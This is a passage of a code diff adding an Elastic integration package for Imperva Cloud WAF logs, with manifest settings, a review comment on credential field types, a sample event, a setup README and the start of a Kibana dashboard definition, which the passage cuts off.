+ - name: shared_credential_file + type: text + title: Shared Credential File + multi: false + required: false + show_user: false + description: Directory of the shared credentials file + - name: credential_profile_name + type: text + title: Credential Profile Name + multi: false + required: false + show_user: false + description: Profile name in shared credentials file. + - name: role_arn + type: text + title: Role ARN + multi: false + required: false + show_user: false + description: AWS IAM Role to assume. + - name: default_region + type: text + title: Default AWS Region + multi: false + required: false + show_user: false + default: "" + description: Default region to use prior to connecting to region specific services/endpoints if no AWS region is set from environment variable, credentials or instance profile. If none of the above are set and no default region is set as well, `us-east-1` is used. A region, either from environment variable, credentials or instance profile or from this default region setting, needs to be set when using regions in non-regular AWS environments such as AWS China or US Government Isolated. + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http\[s\]://:@: + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - forwarded + - imperva_cloud_waf-event + - name: preserve_original_event + required: false + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: false + show_user: false + title: Preserve duplicate custom fields + description: Preserve ocsf fields that were copied to Elastic Common Schema (ECS) fields. 
+ type: bool + multi: false + default: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- 
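Review bot: In the aws-s3 stream, `session_token` is declared `type: text` with `secret: false` even though its own description says it is a temporary security credential; unlike `access_key_id` and `secret_access_key` it will be stored and shown in the agent policy in plain text. Change it to `type: password` and `secret: true` so Fleet handles it like the other two AWS credentials. The `preserve_duplicate_custom_fields` description in the same stream reads `Preserve ocsf fields`, which looks copied from another package; it should say `Preserve imperva_cloud_waf.event fields that were copied to Elastic Common Schema (ECS) fields.` as the cel stream does. `preserve_original_event` is `required: true` in the cel stream but `required: false` in the aws-s3 stream; aligning them avoids the two inputs treating the same option differently.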
diff --git a/packages/imperva_cloud_waf/data_stream/event/sample_event.json b/packages/imperva_cloud_waf/data_stream/event/sample_event.json
new file mode 100644
index 00000000000..e2ef0c7dcce
--- /dev/null
+++ b/packages/imperva_cloud_waf/data_stream/event/sample_event.json
@@ -0,0 +1,180 @@ +{ + "@timestamp": "2024-01-31T09:22:42.456Z", + "agent": { + "ephemeral_id": "7d22d234-404b-426a-be1c-8ca128c3357b", + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.10.1" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-imperva-cloud-waf-bucket-13510", + "name": "elastic-package-imperva-cloud-waf-bucket-13510" + }, + "object": { + "key": "events.log" + } + } + }, + "cloud": { + "region": "us-east-1" + }, + "data_stream": { + "dataset": "imperva_cloud_waf.event", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "snapshot": false, + "version": "8.10.1" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web" + ], + "code": "1", + "dataset": "imperva_cloud_waf.event", + "end": "2019-08-20T11:31:10.892Z", + "ingested": "2024-01-31T09:22:43Z", + "kind": "event", + "original": "CEF:0|Incapsula|SIEMintegration|1|1|Normal|0| sourceServiceName=site123.abcd.info siteid=1509732 suid=50005477 requestClientApplication=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 deviceFacility=mia ccode=IL tag=www.elvis.com cicode=Rehovot cs7=31.8969 cs7Label=latitude cs8=34.8186 cs8Label=longitude Customer=CEFcustomer123 siteTag=my-site-tag start=1453290121336 request=site123.abcd.info/main.css ref=www.incapsula.com/lama requestmethod=GET cn1=200 app=HTTP deviceExternalID=33411452762204224 in=54 xff=44.44.44.44 cpt=443 src=12.12.12.12 ver=TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 end=1566300670892 additionalReqHeaders=[{\"Accept\":\"*/*\"},{\"x-v\":\"1\"},{\"x-fapi-interaction-id\":\"10.10.10.10\"}] additionalResHeaders=[{\"Content-Type\":\"text/html; charset\\=UTF-8\"}]", + "severity": 0, + "start": "2016-01-20T11:42:01.336Z", + "type": [ + "info" + ] + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + 
"status_code": 200 + } + }, + "imperva_cloud_waf": { + "event": { + "extensions": { + "additional": { + "req_headers": [ + { + "Accept": "*/*" + }, + { + "x-v": "1" + }, + { + "x-fapi-interaction-id": "10.10.10.10" + } + ], + "res_headers": [ + { + "Content-Type": "text/html; charset=UTF-8" + } + ] + }, + "cicode": "Rehovot", + "cs7Label": "latitude", + "cs8Label": "longitude", + "customer": "CEFcustomer123", + "device": { + "externalId": "33411452762204224", + "facility": "mia" + }, + "ref": "www.incapsula.com/lama", + "site": { + "id": "1509732", + "tag": "my-site-tag" + }, + "source": { + "service_name": "site123.abcd.info" + }, + "tag": "www.elvis.com", + "ver": "TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256" + }, + "name": "Normal", + "version": "0" + } + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-imperva-cloud-waf-bucket-13510.s3.us-east-1.amazonaws.com/events.log" + }, + "offset": 134 + }, + "message": "Normal", + "network": { + "application": "http", + "forwarded_ip": "44.44.44.44" + }, + "observer": { + "product": "SIEMintegration", + "vendor": "Incapsula", + "version": "1" + }, + "related": { + "ip": [ + "12.12.12.12", + "44.44.44.44" + ], + "user": [ + "50005477" + ] + }, + "source": { + "bytes": 54, + "geo": { + "country_iso_code": "IL", + "location": { + "lat": 31.8969, + "lon": 34.8186 + } + }, + "ip": "12.12.12.12", + "port": 443, + "service": { + "name": "site123.abcd.info" + }, + "user": { + "id": "50005477" + } + }, + "tags": [ + "collect_sqs_logs", + "preserve_original_event", + "forwarded", + "imperva_cloud_waf-event" + ], + "tls": { + "cipher": "ECDHE-RSA-AES128-GCM-SHA256", + "version": "1.2" + }, + "url": { + "extension": "css", + "original": "site123.abcd.info/main.css", + "path": "site123.abcd.info/main.css" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Firefox", + "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", + "os": { + "full": 
"Windows 7",
+ "name": "Windows",
+ "version": "7"
+ },
+ "version": "40.0."
+ }
+}
\ No newline at end of file
diff --git a/packages/imperva_cloud_waf/docs/README.md b/packages/imperva_cloud_waf/docs/README.md
new file mode 100644
index 00000000000..7804458cb4b
--- /dev/null
+++ b/packages/imperva_cloud_waf/docs/README.md
@@ -0,0 +1,360 @@ +# Imperva Cloud WAF + +Imperva Cloud WAF is a cloud-based application delivery service that includes web security, DDoS protection, CDN, and load balancing. + +## Data streams + +This integration supports ingestion of events from Imperva Cloud WAF, via AWS S3 input or via [Imperva API](https://docs.imperva.com/bundle/cloud-application-security/page/settings/log-integration.htm). + +**Event** is used to retrieve access and security events. See more details in the documentation [here](https://docs.imperva.com/bundle/cloud-application-security/page/more/log-file-structure.htm). + +## Requirements + +Elastic Agent must be installed. For more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, and manage your agents in a central location. We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, you install Elastic Agent and manually configure the agent locally on the system where it’s installed. You are responsible for managing and upgrading the agents. This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, and we provide deployment manifests for running on Kubernetes. 
+ +There are some minimum requirements for running Elastic Agent and for more information, refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.10.1**. + +## Setup + +### Steps to setup Amazon S3 Connection(Push Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Amazon S3**. +4. Next, fill in your credentials: + Your S3 Access key, Secret key, and Path, where path is the location of the folder where you want to store the logs. Enter the path in the following format: /. For example: MyBucket/MyIncapsulaLogFolder. +5. Click Test connection to perform a full testing cycle in which a test file will be transferred to your designated folder. The test file does not contain real data, and will be removed by Incapsula when the transfer is complete. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Steps to obtain API URL, API Key and API ID(Pull Mode): + +1. Login to your [Imperva Cloud WAF console](https://authentication-management.service.imperva.com/login). +2. On the sidebar, click Logs > Log Setup. +3. Connection. Select **Imperva API**. +4. From this window copy and keep API Key handy, this will be required for further Integration configuration. +5. Copy **API ID** and **Log Server URI**. +6. Configure the additional options: + - Format. Select the format for the log files: CEF + - Compress logs. By default, log files are compressed. Clear this option to keep the logs uncompressed. + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations +2. In "Search for integrations" search bar, type Imperva Cloud WAF +3. 
Click on the "Imperva Cloud WAF" integration from the search results. +4. Click on the "Add Imperva Cloud WAF" button to add the integration. +5. While adding the integration, if you want to collect logs via AWS S3, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - bucket arn + - collect logs via S3 Bucket toggled on + + or if you want to collect logs via AWS SQS, keep **Collect Imperva Cloud WAF logs via AWS S3 or AWS SQS** toggle on and then configure following parameters: + - access key id + - secret access key + - queue url + - collect logs via S3 Bucket toggled off + + or if you want to collect logs via API, keep **Collect Imperva Cloud WAF logs via API** toggle on and and then configure following parameters: + - API ID + - API Key + - URL +6. Save the integration. + +**NOTE**: There are other input combination options available for AWS S3 input, please check [here](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html). + +## Logs Reference + +### Event + +This is the `Event` dataset. 
+ +#### Example + +An example event for `event` looks as following: + +```json +{ + "@timestamp": "2024-01-31T09:22:42.456Z", + "agent": { + "ephemeral_id": "7d22d234-404b-426a-be1c-8ca128c3357b", + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.10.1" + }, + "aws": { + "s3": { + "bucket": { + "arn": "arn:aws:s3:::elastic-package-imperva-cloud-waf-bucket-13510", + "name": "elastic-package-imperva-cloud-waf-bucket-13510" + }, + "object": { + "key": "events.log" + } + } + }, + "cloud": { + "region": "us-east-1" + }, + "data_stream": { + "dataset": "imperva_cloud_waf.event", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "1c0e504b-c5db-46af-aa55-bd7efb79ed8c", + "snapshot": false, + "version": "8.10.1" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "web" + ], + "code": "1", + "dataset": "imperva_cloud_waf.event", + "end": "2019-08-20T11:31:10.892Z", + "ingested": "2024-01-31T09:22:43Z", + "kind": "event", + "original": "CEF:0|Incapsula|SIEMintegration|1|1|Normal|0| sourceServiceName=site123.abcd.info siteid=1509732 suid=50005477 requestClientApplication=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 deviceFacility=mia ccode=IL tag=www.elvis.com cicode=Rehovot cs7=31.8969 cs7Label=latitude cs8=34.8186 cs8Label=longitude Customer=CEFcustomer123 siteTag=my-site-tag start=1453290121336 request=site123.abcd.info/main.css ref=www.incapsula.com/lama requestmethod=GET cn1=200 app=HTTP deviceExternalID=33411452762204224 in=54 xff=44.44.44.44 cpt=443 src=12.12.12.12 ver=TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 end=1566300670892 additionalReqHeaders=[{\"Accept\":\"*/*\"},{\"x-v\":\"1\"},{\"x-fapi-interaction-id\":\"10.10.10.10\"}] additionalResHeaders=[{\"Content-Type\":\"text/html; charset\\=UTF-8\"}]", + "severity": 0, + "start": "2016-01-20T11:42:01.336Z", + "type": [ + "info" + ] + }, + "http": { + 
"request": { + "method": "GET" + }, + "response": { + "status_code": 200 + } + }, + "imperva_cloud_waf": { + "event": { + "extensions": { + "additional": { + "req_headers": [ + { + "Accept": "*/*" + }, + { + "x-v": "1" + }, + { + "x-fapi-interaction-id": "10.10.10.10" + } + ], + "res_headers": [ + { + "Content-Type": "text/html; charset=UTF-8" + } + ] + }, + "cicode": "Rehovot", + "cs7Label": "latitude", + "cs8Label": "longitude", + "customer": "CEFcustomer123", + "device": { + "externalId": "33411452762204224", + "facility": "mia" + }, + "ref": "www.incapsula.com/lama", + "site": { + "id": "1509732", + "tag": "my-site-tag" + }, + "source": { + "service_name": "site123.abcd.info" + }, + "tag": "www.elvis.com", + "ver": "TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256" + }, + "name": "Normal", + "version": "0" + } + }, + "input": { + "type": "aws-s3" + }, + "log": { + "file": { + "path": "https://elastic-package-imperva-cloud-waf-bucket-13510.s3.us-east-1.amazonaws.com/events.log" + }, + "offset": 134 + }, + "message": "Normal", + "network": { + "application": "http", + "forwarded_ip": "44.44.44.44" + }, + "observer": { + "product": "SIEMintegration", + "vendor": "Incapsula", + "version": "1" + }, + "related": { + "ip": [ + "12.12.12.12", + "44.44.44.44" + ], + "user": [ + "50005477" + ] + }, + "source": { + "bytes": 54, + "geo": { + "country_iso_code": "IL", + "location": { + "lat": 31.8969, + "lon": 34.8186 + } + }, + "ip": "12.12.12.12", + "port": 443, + "service": { + "name": "site123.abcd.info" + }, + "user": { + "id": "50005477" + } + }, + "tags": [ + "collect_sqs_logs", + "preserve_original_event", + "forwarded", + "imperva_cloud_waf-event" + ], + "tls": { + "cipher": "ECDHE-RSA-AES128-GCM-SHA256", + "version": "1.2" + }, + "url": { + "extension": "css", + "original": "site123.abcd.info/main.css", + "path": "site123.abcd.info/main.css" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Firefox", + "original": "Mozilla/5.0 (Windows NT 6.1; WOW64; 
rv:40.0) Gecko/20100101 Firefox/40.0", + "os": { + "full": "Windows 7", + "name": "Windows", + "version": "7" + }, + "version": "40.0." + } +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| aws.s3.bucket.arn | The AWS S3 bucket ARN. | keyword | +| aws.s3.bucket.name | The AWS S3 bucket name. | keyword | +| aws.s3.object.key | The AWS S3 Object key. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| destination.process.name | | keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| imperva_cloud_waf.event.device.event_class_id | Signature Id. | keyword | +| imperva_cloud_waf.event.device.product | The product or service that is generating the logs. | keyword | +| imperva_cloud_waf.event.device.vendor | The vendor that is generating the logs. | keyword | +| imperva_cloud_waf.event.device.version | An integer that identifies the version of the log format. | keyword | +| imperva_cloud_waf.event.extensions.action | The method in which Imperva processed the request. | keyword | +| imperva_cloud_waf.event.extensions.additional.req_headers | Request headers in JSON format, with each field represented as a name-value pair. | object | +| imperva_cloud_waf.event.extensions.additional.res_headers | Response headers in JSON format, with each field represented as a name-value pair. | object | +| imperva_cloud_waf.event.extensions.application_protocol | The request protocol. | keyword | +| imperva_cloud_waf.event.extensions.bytes_in | The content length. | long | +| imperva_cloud_waf.event.extensions.ccode | The country code of the site visitor. | keyword | +| imperva_cloud_waf.event.extensions.cicode | The city code of the site visitor. 
| keyword | +| imperva_cloud_waf.event.extensions.cpt | The client port used to communicate the request. | long | +| imperva_cloud_waf.event.extensions.cs10 | JSON describing all actions that were applied to a specific request. | object | +| imperva_cloud_waf.event.extensions.cs10Label | | keyword | +| imperva_cloud_waf.event.extensions.cs11 | Additional information on the violation that triggered the rule, in JSON format. | object | +| imperva_cloud_waf.event.extensions.cs11Label | | keyword | +| imperva_cloud_waf.event.extensions.cs7 | The latitude of the event. | double | +| imperva_cloud_waf.event.extensions.cs7Label | | keyword | +| imperva_cloud_waf.event.extensions.cs8 | The longitude of the event. | double | +| imperva_cloud_waf.event.extensions.cs8Label | | keyword | +| imperva_cloud_waf.event.extensions.cs9 | The threat rule name that this request triggered. | keyword | +| imperva_cloud_waf.event.extensions.cs9Label | | keyword | +| imperva_cloud_waf.event.extensions.customer | The account name of the site owner. | keyword | +| imperva_cloud_waf.event.extensions.destination_process_name | The browser type. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_number1 | The HTTP response code returned to the client. | long | +| imperva_cloud_waf.event.extensions.device.custom_string1 | Whether or not the client application supports Captcha. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string1_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string2 | Whether or not the client application supports JavaScript. | boolean | +| imperva_cloud_waf.event.extensions.device.custom_string2_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string3 | Whether or not the client application supports cookies. | boolean | +| imperva_cloud_waf.event.extensions.device.custom_string3_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string4 | The ID of the visitor. 
| keyword | +| imperva_cloud_waf.event.extensions.device.custom_string4_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string5 | For internal use. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string5_label | | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string6 | The client application software. | keyword | +| imperva_cloud_waf.event.extensions.device.custom_string6_label | | keyword | +| imperva_cloud_waf.event.extensions.device.externalId | A unique identifier of the request that can be used to correlate with reports and data from the Imperva Cloud Security Console. | keyword | +| imperva_cloud_waf.event.extensions.device.facility | The Imperva PoP that handled the request. | keyword | +| imperva_cloud_waf.event.extensions.end_time | The end time of the response to the request, in UTC. In UNIX epoch time format. | date | +| imperva_cloud_waf.event.extensions.file.permission | Imperva attack id. | keyword | +| imperva_cloud_waf.event.extensions.file.type | The type of attack. | keyword | +| imperva_cloud_waf.event.extensions.file_id | The unique identification. | keyword | +| imperva_cloud_waf.event.extensions.postbody | The post body data of the request. | keyword | +| imperva_cloud_waf.event.extensions.qstr | The query string of the request. | keyword | +| imperva_cloud_waf.event.extensions.ref | The URL of the previous page that the client visited. | keyword | +| imperva_cloud_waf.event.extensions.request.client_application | The UserAgent header value. | keyword | +| imperva_cloud_waf.event.extensions.request.method | The request method. | keyword | +| imperva_cloud_waf.event.extensions.request.url | The URL of the request. | keyword | +| imperva_cloud_waf.event.extensions.sip | The IP address of the server. | ip | +| imperva_cloud_waf.event.extensions.site.id | The numeric identifier of the site. | keyword | +| imperva_cloud_waf.event.extensions.site.tag | Site level reference ID. 
| keyword | +| imperva_cloud_waf.event.extensions.source.address | The client IP that made the request. | ip | +| imperva_cloud_waf.event.extensions.source.port | The port of the server. | long | +| imperva_cloud_waf.event.extensions.source.service_name | The name of the site. | keyword | +| imperva_cloud_waf.event.extensions.source.user_id | The numeric identifier of the account of the site owner. | keyword | +| imperva_cloud_waf.event.extensions.start_time | The time in which this visit started, in UTC. In UNIX epoch time format. | date | +| imperva_cloud_waf.event.extensions.tag | Account level reference ID. | keyword | +| imperva_cloud_waf.event.extensions.ver | The TLS version and encryption algorithms used in the request. | keyword | +| imperva_cloud_waf.event.extensions.xff | The X-Forwarded-For request header. | ip | +| imperva_cloud_waf.event.name | The rule type that was triggered. | keyword | +| imperva_cloud_waf.event.severity | Imperva internal rule ID number. | long | +| imperva_cloud_waf.event.version | An integer that identifies the version of the log format. | keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| source.service.name | | keyword | +| tags | User defined tags. | keyword | + diff --git a/packages/imperva_cloud_waf/img/imperva-cwaf-dashboard.png b/packages/imperva_cloud_waf/img/imperva-cwaf-dashboard.png new file mode 100644 index 00000000000..422d7cbee94 Binary files /dev/null and b/packages/imperva_cloud_waf/img/imperva-cwaf-dashboard.png differ diff --git a/packages/imperva_cloud_waf/img/imperva-logo.svg b/packages/imperva_cloud_waf/img/imperva-logo.svg new file mode 100644 index 00000000000..5d71b569eed --- /dev/null +++ b/packages/imperva_cloud_waf/img/imperva-logo.svg @@ -0,0 +1,12 @@ + + + + + + + + + + + + 
diff --git a/packages/imperva_cloud_waf/kibana/dashboard/imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773.json b/packages/imperva_cloud_waf/kibana/dashboard/imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773.json new file mode 100644 index 00000000000..64685c26191 --- /dev/null +++ b/packages/imperva_cloud_waf/kibana/dashboard/imperva_cloud_waf-6fbc3530-9a84-11ee-b689-05e9d8af2773.json 
@@ -0,0 +1,3120 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"2dccd049-7bea-48b0-ab19-7ffbbcd453f1\":{\"type\":\"optionsListControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"2dccd049-7bea-48b0-ab19-7ffbbcd453f1\",\"fieldName\":\"source.service.name\",\"title\":\"Site Name\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"5bb7309d-d7d1-41f5-9326-604454396111\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5bb7309d-d7d1-41f5-9326-604454396111\",\"fieldName\":\"imperva_cloud_waf.event.name\",\"title\":\"Rule Type\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"449e7daa-7a00-4195-8844-380171d6a2ab\":{\"type\":\"optionsListControl\",\"order\":2,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"449e7daa-7a00-4195-8844-380171d6a2ab\",\"fieldName\":\"event.action\",\"title\":\"Action\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}}}" + }, + "description": "Overview of the Events collected by the Imperva Cloud WAF.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "\n#### Imperva Cloud WAF\n\n#### Overview\n\nThis dashboard visualizes security and access related events collected by 
Imperva Cloud WAF using the Event Data-stream. It provides metrics for total sites and different types of requests . It also provides an overview of events on the basis of browser type, http status code, request type, country code, action, attack type, client application, URL, User Agent and Source IP.\n\n[**Integration Page**](/app/integrations/detail/imperva_cloud_waf/overview)\n\n\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 33, + "i": "d03abee6-360a-48f0-b709-4bddaf103713", + "w": 10, + "x": 0, + "y": 0 + }, + "panelIndex": "d03abee6-360a-48f0-b709-4bddaf103713", + "title": "Table of Contents", + "type": "visualization", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ee1f5d67-a0cd-4e67-a843-ac23283cf80a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "6ded837a-330f-4592-b843-330781c144c3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ee1f5d67-a0cd-4e67-a843-ac23283cf80a": { + "columnOrder": [ + "9c5b3fed-2412-4b93-bada-9b4d1c630de7" + ], + "columns": { + "9c5b3fed-2412-4b93-bada-9b4d1c630de7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Sites", + "operationType": "unique_count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "source.service.name" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "6ded837a-330f-4592-b843-330781c144c3", + "key": "data_stream.dataset", 
+ "negate": false, + "params": { + "query": "imperva_cloud_waf.event" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "imperva_cloud_waf.event" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#6092C0", + "layerId": "ee1f5d67-a0cd-4e67-a843-ac23283cf80a", + "layerType": "data", + "metricAccessor": "9c5b3fed-2412-4b93-bada-9b4d1c630de7" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 18, + "i": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45", + "w": 10, + "x": 10, + "y": 0 + }, + "panelIndex": "63fdf3c4-a96a-4994-9608-35a5d3ce5f45", + "title": "Total Sites", + "type": "lens", + "version": "8.10.1" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ecfb37f1-2f60-4208-aeb7-0ae1b22579c1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2eb63a33-d0ba-432f-bbdb-fd39c3b36993", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "ecfb37f1-2f60-4208-aeb7-0ae1b22579c1": { + "columnOrder": [ + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77" + ], + "columns": { + "d8efdf0f-55db-4e33-bd77-2ff5e821bb77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Requests", + "operationType": "count", + "params": { + "emptyAsNull": false, + "format": { + "id": "number", + "params": { + "decimals": 0 + } + } + }, + "scale": "ratio", + "sourceField": "event.action" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", 
